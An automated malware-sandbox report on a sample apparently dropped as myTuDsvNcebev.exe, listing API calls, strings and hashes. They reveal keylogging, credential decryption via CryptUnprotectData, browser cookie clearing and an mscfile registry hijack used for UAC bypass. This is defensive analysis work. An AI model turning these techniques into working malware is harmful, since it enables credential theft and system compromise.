• API String ID: 336800556-0
• Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
• Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
• Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
• Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
APIs
• CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
• CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
• WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
• CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: File$CloseHandle$CreatePointerWrite
• API String ID: 1852769593-0
• Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
• Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
• Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
• Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                                                                          • int.LIBCPMT ref: 0040FBE8
                                                                                            • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                            • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                          • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                          • String ID:
                                                                                          • API String ID: 2536120697-0
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0044DBB4
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 0044DBC6
                                                                                          • _free.LIBCMT ref: 0044DBD8
                                                                                          • _free.LIBCMT ref: 0044DBEA
                                                                                          • _free.LIBCMT ref: 0044DBFC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00441566
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 00441578
                                                                                          • _free.LIBCMT ref: 0044158B
                                                                                          • _free.LIBCMT ref: 0044159C
                                                                                          • _free.LIBCMT ref: 004415AD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          APIs
                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Enum$InfoQueryValue
                                                                                          • String ID: [regsplt]
                                                                                          • API String ID: 3554306468-4262303796
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __alloca_probe_16__freea
                                                                                          • String ID: H"G$H"GH"G
                                                                                          • API String ID: 1635606685-3036711414
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040189E
                                                                                          • ExitThread.KERNEL32 ref: 004018D6
                                                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                                                                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                          • String ID: 8:G
                                                                                          • API String ID: 1649129571-405301104
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe,00000104), ref: 00440975
                                                                                          • _free.LIBCMT ref: 00440A40
                                                                                          • _free.LIBCMT ref: 00440A4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                          • API String ID: 2506810119-1153660456
                                                                                          APIs
                                                                                            • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                                            • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                                            • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                                          • _wcslen.LIBCMT ref: 00419744
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                          • String ID: .exe$program files (x86)\$program files\
                                                                                          • API String ID: 37874593-1203593143
                                                                                          APIs
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                                                                                          • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                                                                                            • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                                                            • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                                          • String ID: Offline Keylogger Started
                                                                                          • API String ID: 465354869-4114347211
                                                                                          APIs
                                                                                            • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                                                            • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                                                          • String ID: Online Keylogger Started
                                                                                          • API String ID: 112202259-1258561607
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?), ref: 00404F61
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
                                                                                          Strings
                                                                                          • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$EventLocalThreadTime
                                                                                          • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                          • API String ID: 2532271599-507513762
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: CryptUnprotectData$crypt32
                                                                                          • API String ID: 2574300362-2380590389
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
• CloseHandle.KERNEL32(?), ref: 004051AA
• SetEvent.KERNEL32(?), ref: 004051B9
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Exception@8Throw
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-1866435925
APIs
• RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
• RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
• RegCloseKey.ADVAPI32(00000000), ref: 00412128
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: origmsc
• API String ID: 3677997916-68016026
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
APIs
• RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
• RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
• RegCloseKey.ADVAPI32(00000000), ref: 00412054
Strings
• http\shell\open\command, xrefs: 00412026
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: http\shell\open\command
• API String ID: 3677997916-1487954565
APIs
• RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
• RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
• RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
Strings
• Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: Software\Classes\mscfile\shell\open\command
• API String ID: 1818849710-505396733
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
• RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
• RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: P0F
• API String ID: 1818849710-3540264436
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
• GetProcAddress.KERNEL32(00000000), ref: 00401403
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
• GetProcAddress.KERNEL32(00000000), ref: 004014A8
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
• CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
• CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
Strings
• Cleared browsers logins and cookies., xrefs: 0040B036
• [Cleared browsers logins and cookies.], xrefs: 0040B025
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
                                                                                          • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                                                                          • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                                                                          • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                                                                          • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                                                                          APIs
                                                                                            • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                                                                            • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                                                                            • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                          • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQuerySleepValue
                                                                                          • String ID: H"G$exepath$!G
                                                                                          • API String ID: 4119054056-2148977334
                                                                                          • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                                                                          • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                                                                          • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                                                                          • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                                                                          APIs
                                                                                            • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                                                                            • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                                                                            • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040955A
                                                                                          • Sleep.KERNEL32(00000064), ref: 004095F5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$SleepText$ForegroundLength
                                                                                          • String ID: [ $ ]
                                                                                          • API String ID: 3309952895-93608704
                                                                                          • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                                                                          • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                                                                          • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                                                                          • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                                                                          • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                                                                          • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                                                                          • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                                                                          • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                                                                          • Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                                                                          • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                          • String ID:
                                                                                          • API String ID: 3919263394-0
                                                                                          • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                                                                          • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                                                                          • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                                                                          • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                                                                          APIs
                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                                                                            • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                          • String ID:
                                                                                          • API String ID: 1761009282-0
                                                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                          • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                          • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                                                                          APIs
                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
